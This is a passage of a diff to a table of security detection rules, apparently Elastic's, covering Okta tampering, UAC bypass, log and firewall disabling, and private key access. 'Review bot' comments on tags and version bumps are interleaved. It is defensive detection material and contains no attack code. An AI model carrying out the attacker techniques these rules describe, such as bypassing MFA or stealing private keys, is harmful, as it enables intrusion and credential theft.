Audit], [Tactic: Persistence] |8.3.0 |104 +|<<administrator-role-assigned-to-an-okta-user, Administrator Role Assigned to an Okta User>> |Identifies when an administrator role is assigned to an Okta user. 
An adversary may attempt to assign an administrator role to an Okta user in order to assign additional permissions to a user account and maintain access to their target's environment. |[Data Source: Okta], [Use Case: Identity and Access Audit], [Tactic: Persistence] |8.10.0 |205 -|<<adobe-hijack-persistence, Adobe Hijack Persistence>> |Detects writing executable files that will be automatically launched by Adobe on launch. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 +|<<adobe-hijack-persistence, Adobe Hijack Persistence>> |Detects writing executable files that will be automatically launched by Adobe on launch. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 |<<adversary-behavior-detected-elastic-endgame, Adversary Behavior - Detected - Elastic Endgame>> |Elastic Endgame detected an Adversary Behavior. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information. |[Data Source: Elastic Endgame] |8.3.0 |102 
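Review bot: the `+` row for Account Password Reset Remotely adds [Tactic: Impact], but its description is unchanged and still only describes maintaining access and preserving compromised credentials, which is the Persistence mapping; either drop the new tag or extend the description to say which Impact behaviour the rule covers. The same check applies to the [Tactic: Privilege Escalation] tag added to Account Discovery Command via SYSTEM Account and the [Tactic: Persistence] tag added to Adding Hidden File Attribute via Attrib, where the description text is also carried over word for word. For the rows whose only change is the trailing version number (AdFind Command Activity 106 to 107, AdminSDHolder Backdoor 105 to 106, Adobe Hijack Persistence 107 to 108), a one-line note in the release notes on what changed in the rule would save readers a diff of the per-rule pages.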
@@ -186,33 +186,35 @@ and their rule type is `machine_learning`. |<<application-removed-from-blocklist-in-google-workspace, Application Removed from Blocklist in Google Workspace>> |Google Workspace administrators may be aware of malicious applications within the Google marketplace and block these applications for user security purposes. An adversary, with administrative privileges, may remove this application from the explicit block list to allow distribution of the application amongst users. This may also indicate the unauthorized use of an application that had been previously blocked before by a user with admin privileges. |[Domain: Cloud], [Data Source: Google Workspace], [Use Case: Configuration Audit], [Resources: Investigation Guide], [Tactic: Defense Evasion] |8.4.0 |106 -|<<at-exe-command-lateral-movement, At.exe Command Lateral Movement>> |Identifies use of at.exe to interact with the task scheduler on remote hosts. Remote task creations, modifications or execution could be indicative of adversary lateral movement. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 +|<<archive-file-with-unusual-extension, Archive File with Unusual Extension>> |Identifies the creation of an archive file with an unusual extension. Attackers may attempt to evade detection by masquerading files using the file extension values used by image, audio, or document file types. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 -|<<attempt-to-create-okta-api-token, Attempt to Create Okta API Token>> |Detects attempts to create an Okta API token. An adversary may create an Okta API token to maintain access to an organization's network while they work to achieve their objectives. 
An attacker may abuse an API token to execute techniques such as creating user accounts or disabling security rules or policies. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Persistence] |8.3.0 |104 +|<<at-exe-command-lateral-movement, At.exe Command Lateral Movement>> |Identifies use of at.exe to interact with the task scheduler on remote hosts. Remote task creations, modifications or execution could be indicative of adversary lateral movement. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |2 -|<<attempt-to-deactivate-mfa-for-an-okta-user-account, Attempt to Deactivate MFA for an Okta User Account>> |Detects attempts to deactivate multi-factor authentication (MFA) for an Okta user. An adversary may deactivate MFA for an Okta user account in order to weaken the authentication requirements for the account. |[Tactic: Persistence], [Use Case: Identity and Access Audit], [Data Source: Okta] |8.3.0 |105 +|<<attempt-to-create-okta-api-token, Attempt to Create Okta API Token>> |Detects attempts to create an Okta API token. An adversary may create an Okta API token to maintain access to an organization's network while they work to achieve their objectives. An attacker may abuse an API token to execute techniques such as creating user accounts or disabling security rules or policies. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Persistence] |8.10.0 |205 -|<<attempt-to-deactivate-an-okta-application, Attempt to Deactivate an Okta Application>> |Detects attempts to deactivate an Okta application. An adversary may attempt to modify, deactivate, or delete an Okta application in order to weaken an organization's security controls or disrupt their business operations. 
|[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Impact] |8.3.0 |105 +|<<attempt-to-deactivate-mfa-for-an-okta-user-account, Attempt to Deactivate MFA for an Okta User Account>> |Detects attempts to deactivate multi-factor authentication (MFA) for an Okta user. An adversary may deactivate MFA for an Okta user account in order to weaken the authentication requirements for the account. |[Tactic: Persistence], [Use Case: Identity and Access Audit], [Data Source: Okta] |8.10.0 |206 -|<<attempt-to-deactivate-an-okta-network-zone, Attempt to Deactivate an Okta Network Zone>> |Detects attempts to deactivate an Okta network zone. Okta network zones can be configured to limit or restrict access to a network based on IP addresses or geolocations. An adversary may attempt to modify, delete, or deactivate an Okta network zone in order to remove or weaken an organization's security controls. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Use Case: Network Security Monitoring], [Tactic: Defense Evasion] |8.3.0 |105 +|<<attempt-to-deactivate-an-okta-application, Attempt to Deactivate an Okta Application>> |Detects attempts to deactivate an Okta application. An adversary may attempt to modify, deactivate, or delete an Okta application in order to weaken an organization's security controls or disrupt their business operations. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Impact] |8.10.0 |206 -|<<attempt-to-deactivate-an-okta-policy, Attempt to Deactivate an Okta Policy>> |Detects attempts to deactivate an Okta policy. An adversary may attempt to deactivate an Okta policy in order to weaken an organization's security controls. For example, an adversary may attempt to deactivate an Okta multi-factor authentication (MFA) policy in order to weaken the authentication requirements for user accounts. 
|[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Defense Evasion] |8.3.0 |105 +|<<attempt-to-deactivate-an-okta-network-zone, Attempt to Deactivate an Okta Network Zone>> |Detects attempts to deactivate an Okta network zone. Okta network zones can be configured to limit or restrict access to a network based on IP addresses or geolocations. An adversary may attempt to modify, delete, or deactivate an Okta network zone in order to remove or weaken an organization's security controls. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Use Case: Network Security Monitoring], [Tactic: Defense Evasion] |8.10.0 |206 -|<<attempt-to-deactivate-an-okta-policy-rule, Attempt to Deactivate an Okta Policy Rule>> |Detects attempts to deactivate a rule within an Okta policy. An adversary may attempt to deactivate a rule within an Okta policy in order to remove or weaken an organization's security controls. |[Use Case: Identity and Access Audit], [Tactic: Defense Evasion], [Data Source: Okta] |8.3.0 |106 +|<<attempt-to-deactivate-an-okta-policy, Attempt to Deactivate an Okta Policy>> |Detects attempts to deactivate an Okta policy. An adversary may attempt to deactivate an Okta policy in order to weaken an organization's security controls. For example, an adversary may attempt to deactivate an Okta multi-factor authentication (MFA) policy in order to weaken the authentication requirements for user accounts. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Defense Evasion] |8.10.0 |206 -|<<attempt-to-delete-an-okta-application, Attempt to Delete an Okta Application>> |Detects attempts to delete an Okta application. An adversary may attempt to modify, deactivate, or delete an Okta application in order to weaken an organization's security controls or disrupt their business operations. 
|[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Impact] |8.3.0 |104 +|<<attempt-to-deactivate-an-okta-policy-rule, Attempt to Deactivate an Okta Policy Rule>> |Detects attempts to deactivate a rule within an Okta policy. An adversary may attempt to deactivate a rule within an Okta policy in order to remove or weaken an organization's security controls. |[Use Case: Identity and Access Audit], [Tactic: Defense Evasion], [Data Source: Okta] |8.10.0 |207 -|<<attempt-to-delete-an-okta-network-zone, Attempt to Delete an Okta Network Zone>> |Detects attempts to delete an Okta network zone. Okta network zones can be configured to limit or restrict access to a network based on IP addresses or geolocations. An adversary may attempt to modify, delete, or deactivate an Okta network zone in order to remove or weaken an organization's security controls. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Use Case: Network Security Monitoring], [Tactic: Defense Evasion] |8.3.0 |105 +|<<attempt-to-delete-an-okta-application, Attempt to Delete an Okta Application>> |Detects attempts to delete an Okta application. An adversary may attempt to modify, deactivate, or delete an Okta application in order to weaken an organization's security controls or disrupt their business operations. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Impact] |8.10.0 |205 -|<<attempt-to-delete-an-okta-policy, Attempt to Delete an Okta Policy>> |Detects attempts to delete an Okta policy. An adversary may attempt to delete an Okta policy in order to weaken an organization's security controls. For example, an adversary may attempt to delete an Okta multi-factor authentication (MFA) policy in order to weaken the authentication requirements for user accounts. 
|[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Defense Evasion] |8.3.0 |105 +|<<attempt-to-delete-an-okta-network-zone, Attempt to Delete an Okta Network Zone>> |Detects attempts to delete an Okta network zone. Okta network zones can be configured to limit or restrict access to a network based on IP addresses or geolocations. An adversary may attempt to modify, delete, or deactivate an Okta network zone in order to remove or weaken an organization's security controls. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Use Case: Network Security Monitoring], [Tactic: Defense Evasion] |8.10.0 |206 -|<<attempt-to-delete-an-okta-policy-rule, Attempt to Delete an Okta Policy Rule>> |Detects attempts to delete a rule within an Okta policy. An adversary may attempt to delete an Okta policy rule in order to weaken an organization's security controls. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Defense Evasion] |8.3.0 |105 +|<<attempt-to-delete-an-okta-policy, Attempt to Delete an Okta Policy>> |Detects attempts to delete an Okta policy. An adversary may attempt to delete an Okta policy in order to weaken an organization's security controls. For example, an adversary may attempt to delete an Okta multi-factor authentication (MFA) policy in order to weaken the authentication requirements for user accounts. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Defense Evasion] |8.10.0 |206 + +|<<attempt-to-delete-an-okta-policy-rule, Attempt to Delete an Okta Policy Rule>> |Detects attempts to delete a rule within an Okta policy. An adversary may attempt to delete an Okta policy rule in order to weaken an organization's security controls. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Defense Evasion] |8.10.0 |206 |<<attempt-to-disable-gatekeeper, Attempt to Disable Gatekeeper>> |Detects attempts to disable Gatekeeper on macOS. 
Gatekeeper is a security feature that's designed to ensure that only trusted software is run. Adversaries may attempt to disable Gatekeeper before executing malicious code. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |104 -|<<attempt-to-disable-iptables-or-firewall, Attempt to Disable IPTables or Firewall>> |Adversaries may attempt to disable the iptables or firewall service in an attempt to affect how a host is allowed to receive or send network traffic. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |3 +|<<attempt-to-disable-iptables-or-firewall, Attempt to Disable IPTables or Firewall>> |Adversaries may attempt to disable the iptables or firewall service in an attempt to affect how a host is allowed to receive or send network traffic. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |4 -|<<attempt-to-disable-syslog-service, Attempt to Disable Syslog Service>> |Adversaries may attempt to disable the syslog service in an attempt to an attempt to disrupt event logging and evade detection by security controls. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<attempt-to-disable-syslog-service, Attempt to Disable Syslog Service>> |Adversaries may attempt to disable the syslog service in an attempt to an attempt to disrupt event logging and evade detection by security controls. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 |<<attempt-to-enable-the-root-account, Attempt to Enable the Root Account>> |Identifies attempts to enable the root account using the dsenableroot command. 
This command may be abused by adversaries for persistence, as the root account is disabled by default. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend] |8.3.0 |104 
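Review bot: the refreshed Attempt to Disable Syslog Service row (version 106 to 107) carries the duplicated phrase "in an attempt to an attempt to disrupt event logging" over unchanged from the `-` row; if this table is generated from the rule metadata, the fix belongs in the rule's description, e.g. "Adversaries may attempt to disable the syslog service in an attempt to disrupt event logging and evade detection by security controls." Also, the added empty `+` line between the Attempt to Delete an Okta Policy and Attempt to Delete an Okta Policy Rule rows is the only blank row separator in this part of the table; it is harmless in an AsciiDoc table, but worth removing so the row layout stays consistent with the surrounding entries.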
@@ -220,31 +222,31 @@ and their rule type is `machine_learning`. |<<attempt-to-install-root-certificate, Attempt to Install Root Certificate>> |Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to their command and control servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |104 -|<<attempt-to-modify-an-okta-application, Attempt to Modify an Okta Application>> |Detects attempts to modify an Okta application. An adversary may attempt to modify, deactivate, or delete an Okta application in order to weaken an organization's security controls or disrupt their business operations. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Impact] |8.3.0 |104 +|<<attempt-to-modify-an-okta-application, Attempt to Modify an Okta Application>> |Detects attempts to modify an Okta application. An adversary may attempt to modify, deactivate, or delete an Okta application in order to weaken an organization's security controls or disrupt their business operations. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Impact] |8.10.0 |205 -|<<attempt-to-modify-an-okta-network-zone, Attempt to Modify an Okta Network Zone>> |Detects attempts to modify an Okta network zone. Okta network zones can be configured to limit or restrict access to a network based on IP addresses or geolocations. An adversary may attempt to modify, delete, or deactivate an Okta network zone in order to remove or weaken an organization's security controls. 
|[Use Case: Identity and Access Audit], [Data Source: Okta], [Use Case: Network Security Monitoring], [Tactic: Defense Evasion] |8.3.0 |105 +|<<attempt-to-modify-an-okta-network-zone, Attempt to Modify an Okta Network Zone>> |Detects attempts to modify an Okta network zone. Okta network zones can be configured to limit or restrict access to a network based on IP addresses or geolocations. An adversary may attempt to modify, delete, or deactivate an Okta network zone in order to remove or weaken an organization's security controls. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Use Case: Network Security Monitoring], [Tactic: Defense Evasion] |8.10.0 |206 -|<<attempt-to-modify-an-okta-policy, Attempt to Modify an Okta Policy>> |Detects attempts to modify an Okta policy. An adversary may attempt to modify an Okta policy in order to weaken an organization's security controls. For example, an adversary may attempt to modify an Okta multi-factor authentication (MFA) policy in order to weaken the authentication requirements for user accounts. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Defense Evasion] |8.3.0 |105 +|<<attempt-to-modify-an-okta-policy, Attempt to Modify an Okta Policy>> |Detects attempts to modify an Okta policy. An adversary may attempt to modify an Okta policy in order to weaken an organization's security controls. For example, an adversary may attempt to modify an Okta multi-factor authentication (MFA) policy in order to weaken the authentication requirements for user accounts. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Defense Evasion] |8.10.0 |206 -|<<attempt-to-modify-an-okta-policy-rule, Attempt to Modify an Okta Policy Rule>> |Detects attempts to modify a rule within an Okta policy. An adversary may attempt to modify an Okta policy rule in order to weaken an organization's security controls. 
|[Use Case: Identity and Access Audit], [Tactic: Defense Evasion], [Data Source: Okta] |8.3.0 |106 +|<<attempt-to-modify-an-okta-policy-rule, Attempt to Modify an Okta Policy Rule>> |Detects attempts to modify a rule within an Okta policy. An adversary may attempt to modify an Okta policy rule in order to weaken an organization's security controls. |[Use Case: Identity and Access Audit], [Tactic: Defense Evasion], [Data Source: Okta] |8.10.0 |207 |<<attempt-to-mount-smb-share-via-command-line, Attempt to Mount SMB Share via Command Line>> |Identifies the execution of macOS built-in commands to mount a Server Message Block (SMB) network share. Adversaries may use valid accounts to interact with a remote network share using SMB. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Defend] |8.3.0 |104 |<<attempt-to-remove-file-quarantine-attribute, Attempt to Remove File Quarantine Attribute>> |Identifies a potential Gatekeeper bypass. In macOS, when applications or programs are downloaded from the internet, there is a quarantine flag set on the file. This attribute is read by Apple's Gatekeeper defense program at execution time. An adversary may disable this attribute to evade defenses. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |104 -|<<attempt-to-reset-mfa-factors-for-an-okta-user-account, Attempt to Reset MFA Factors for an Okta User Account>> |Detects attempts to reset an Okta user's enrolled multi-factor authentication (MFA) factors. An adversary may attempt to reset the MFA factors for an Okta user's account in order to register new MFA factors and abuse the account to blend in with normal activity in the victim's environment. 
|[Tactic: Persistence], [Use Case: Identity and Access Audit], [Data Source: Okta] |8.3.0 |105 +|<<attempt-to-reset-mfa-factors-for-an-okta-user-account, Attempt to Reset MFA Factors for an Okta User Account>> |Detects attempts to reset an Okta user's enrolled multi-factor authentication (MFA) factors. An adversary may attempt to reset the MFA factors for an Okta user's account in order to register new MFA factors and abuse the account to blend in with normal activity in the victim's environment. |[Tactic: Persistence], [Use Case: Identity and Access Audit], [Data Source: Okta] |8.10.0 |206 -|<<attempt-to-revoke-okta-api-token, Attempt to Revoke Okta API Token>> |Identifies attempts to revoke an Okta API token. An adversary may attempt to revoke or delete an Okta API token to disrupt an organization's business operations. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Impact] |8.3.0 |105 +|<<attempt-to-revoke-okta-api-token, Attempt to Revoke Okta API Token>> |Identifies attempts to revoke an Okta API token. An adversary may attempt to revoke or delete an Okta API token to disrupt an organization's business operations. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Impact] |8.10.0 |206 |<<attempt-to-unload-elastic-endpoint-security-kernel-extension, Attempt to Unload Elastic Endpoint Security Kernel Extension>> |Identifies attempts to unload the Elastic Endpoint Security kernel extension via the kextunload command. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |104 -|<<attempted-bypass-of-okta-mfa, Attempted Bypass of Okta MFA>> |Detects attempts to bypass Okta multi-factor authentication (MFA). An adversary may attempt to bypass the Okta MFA policies configured for an organization in order to obtain unauthorized access to an application. 
|[Data Source: Okta], [Use Case: Identity and Access Audit], [Tactic: Credential Access] |8.3.0 |106 +|<<attempted-bypass-of-okta-mfa, Attempted Bypass of Okta MFA>> |Detects attempts to bypass Okta multi-factor authentication (MFA). An adversary may attempt to bypass the Okta MFA policies configured for an organization in order to obtain unauthorized access to an application. |[Data Source: Okta], [Use Case: Identity and Access Audit], [Tactic: Credential Access] |8.10.0 |207 |<<attempted-private-key-access, Attempted Private Key Access>> |Attackers may try to access private keys, e.g. ssh, in order to gain further authenticated access to the environment. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 |<<attempts-to-brute-force-a-microsoft-365-user-account, Attempts to Brute Force a Microsoft 365 User Account>> |Identifies attempts to brute force a Microsoft 365 user account. An adversary may attempt a brute force attack to obtain unauthorized access to user accounts. |[Domain: Cloud], [Data Source: Microsoft 365], [Use Case: Identity and Access Audit], [Tactic: Credential Access] |8.3.0 |102 -|<<attempts-to-brute-force-an-okta-user-account, Attempts to Brute Force an Okta User Account>> |Identifies when an Okta user account is locked out 3 times within a 3 hour window. An adversary may attempt a brute force or password spraying attack to obtain unauthorized access to user accounts. The default Okta authentication policy ensures that a user account is locked out after 10 failed authentication attempts. |[Use Case: Identity and Access Audit], [Tactic: Credential Access], [Data Source: Okta] |8.3.0 |106 +|<<attempts-to-brute-force-an-okta-user-account, Attempts to Brute Force an Okta User Account>> |Identifies when an Okta user account is locked out 3 times within a 3 hour window. 
An adversary may attempt a brute force or password spraying attack to obtain unauthorized access to user accounts. The default Okta authentication policy ensures that a user account is locked out after 10 failed authentication attempts. |[Use Case: Identity and Access Audit], [Tactic: Credential Access], [Data Source: Okta] |8.10.0 |207 |<<authorization-plugin-modification, Authorization Plugin Modification>> |Authorization plugins are used to extend the authorization services API and implement mechanisms that are not natively supported by the OS, such as multi-factor authentication with third party software. Adversaries may abuse this feature to persist and/or collect clear text credentials as they traverse the registered plugins during user logon. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend] |8.3.0 |104 
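Review bot: every row changed in this hunk is an Okta rule whose minimum stack version moves from 8.3.0 to 8.10.0 and whose version number jumps by about 100 (for example Attempt to Modify an Okta Application, 104 to 205) while its description and tags are unchanged, so nothing in the summary tells a reader why 8.10.0 is now required or what users on 8.3 through 8.9 should expect for these rules; state the reason for the new minimum on the per-rule pages or in the downloadable-updates description the commit message mentions. Separately, Attempts to Brute Force an Okta User Account keeps the thresholds "locked out 3 times within a 3 hour window" and "locked out after 10 failed authentication attempts" in its description; confirm those values still match the rule after the version bump, since the description is the only place a reader sees them.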
@@ -314,55 +316,55 @@ and their rule type is `machine_learning`. |<<azure-virtual-network-device-modified-or-deleted, Azure Virtual Network Device Modified or Deleted>> |Identifies when a virtual network device is modified or deleted. This can be a network virtual appliance, virtual hub, or virtual router. |[Domain: Cloud], [Data Source: Azure], [Use Case: Network Security Monitoring], [Tactic: Impact] |8.3.0 |102 -|<<bpf-filter-applied-using-tc, BPF filter applied using TC>> |Detects when the tc (transmission control) binary is utilized to set a BPF (Berkeley Packet Filter) on a network interface. Tc is used to configure Traffic Control in the Linux kernel. It can shape, schedule, police and drop traffic. A threat actor can utilize tc to set a bpf filter on an interface for the purpose of manipulating the incoming traffic. This technique is not at all common and should indicate abnormal, suspicious or malicious activity. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Threat: TripleCross], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<bpf-filter-applied-using-tc, BPF filter applied using TC>> |Detects when the tc (transmission control) binary is utilized to set a BPF (Berkeley Packet Filter) on a network interface. Tc is used to configure Traffic Control in the Linux kernel. It can shape, schedule, police and drop traffic. A threat actor can utilize tc to set a bpf filter on an interface for the purpose of manipulating the incoming traffic. This technique is not at all common and should indicate abnormal, suspicious or malicious activity. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Threat: TripleCross], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 -|<<base16-or-base32-encoding-decoding-activity, Base16 or Base32 Encoding/Decoding Activity>> |Adversaries may encode/decode data in an attempt to evade detection by host- or network-based security controls. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<base16-or-base32-encoding-decoding-activity, Base16 or Base32 Encoding/Decoding Activity>> |Adversaries may encode/decode data in an attempt to evade detection by host- or network-based security controls. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 -|<<bash-shell-profile-modification, Bash Shell Profile Modification>> |Both ~/.bash_profile and ~/.bashrc are files containing shell commands that are run when Bash is invoked. These files are executed in a user's context, either interactively or non-interactively, when a user logs in so that their environment is set correctly. Adversaries may abuse this to establish persistence by executing malicious content triggered by a user’s shell. |[Domain: Endpoint], [OS: macOS], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend] |8.3.0 |103 +|<<bash-shell-profile-modification, Bash Shell Profile Modification>> |Both ~/.bash_profile and ~/.bashrc are files containing shell commands that are run when Bash is invoked. These files are executed in a user's context, either interactively or non-interactively, when a user logs in so that their environment is set correctly. Adversaries may abuse this to establish persistence by executing malicious content triggered by a user’s shell. 
|[Domain: Endpoint], [OS: macOS], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend] |8.3.0 |104 -|<<binary-content-copy-via-cmd-exe, Binary Content Copy via Cmd.exe>> |Attackers may abuse cmd.exe commands to reassemble binary fragments into a malicious payload. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 +|<<binary-content-copy-via-cmd-exe, Binary Content Copy via Cmd.exe>> |Attackers may abuse cmd.exe commands to reassemble binary fragments into a malicious payload. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |2 -|<<binary-executed-from-shared-memory-directory, Binary Executed from Shared Memory Directory>> |Identifies the execution of a binary by root in Linux shared memory directories: (/dev/shm/, /run/shm/, /var/run/, /var/lock/). This activity is to be considered highly abnormal and should be investigated. Threat actors have placed executables used for persistence on high-uptime servers in these directories as system backdoors. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Threat: BPFDoor], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<binary-executed-from-shared-memory-directory, Binary Executed from Shared Memory Directory>> |Identifies the execution of a binary by root in Linux shared memory directories: (/dev/shm/, /run/shm/, /var/run/, /var/lock/). This activity is to be considered highly abnormal and should be investigated. Threat actors have placed executables used for persistence on high-uptime servers in these directories as system backdoors. 
|[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Threat: BPFDoor], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 |<<bitsadmin-activity, Bitsadmin Activity>> |Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism. Adversaries may abuse BITS to persist, download, execute, and even clean up after running malicious code. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 |<<browser-extension-install, Browser Extension Install>> |Identifies the install of browser extensions. Malicious browser extensions can be installed via app store downloads masquerading as legitimate extensions, social engineering, or by an adversary that has already compromised a system. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 -|<<bypass-uac-via-event-viewer, Bypass UAC via Event Viewer>> |Identifies User Account Control (UAC) bypass via eventvwr.exe. Attackers bypass UAC to stealthily execute code with elevated permissions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 +|<<bypass-uac-via-event-viewer, Bypass UAC via Event Viewer>> |Identifies User Account Control (UAC) bypass via eventvwr.exe. Attackers bypass UAC to stealthily execute code with elevated permissions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 -|<<bypass-uac-via-sdclt, Bypass UAC via Sdclt>> |Identifies User Account Control (UAC) bypass via sdclt.exe. 
Attackers bypass UAC to stealthily execute code with elevated permissions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Data Source: Elastic Defend] |None |1 +|<<bypass-uac-via-sdclt, Bypass UAC via Sdclt>> |Identifies User Account Control (UAC) bypass via sdclt.exe. Attackers bypass UAC to stealthily execute code with elevated permissions. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |None |1 -|<<chkconfig-service-add, Chkconfig Service Add>> |Detects the use of the chkconfig binary to manually add a service for management by chkconfig. Threat actors may utilize this technique to maintain persistence on a system. When a new service is added, chkconfig ensures that the service has either a start or a kill entry in every runlevel and when the system is rebooted the service file added will run providing long-term persistence. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Threat: Lightning Framework], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<chkconfig-service-add, Chkconfig Service Add>> |Detects the use of the chkconfig binary to manually add a service for management by chkconfig. Threat actors may utilize this technique to maintain persistence on a system. When a new service is added, chkconfig ensures that the service has either a start or a kill entry in every runlevel and when the system is rebooted the service file added will run providing long-term persistence. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Threat: Lightning Framework], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<clearing-windows-console-history, Clearing Windows Console History>> |Identifies when a user attempts to clear console history. 
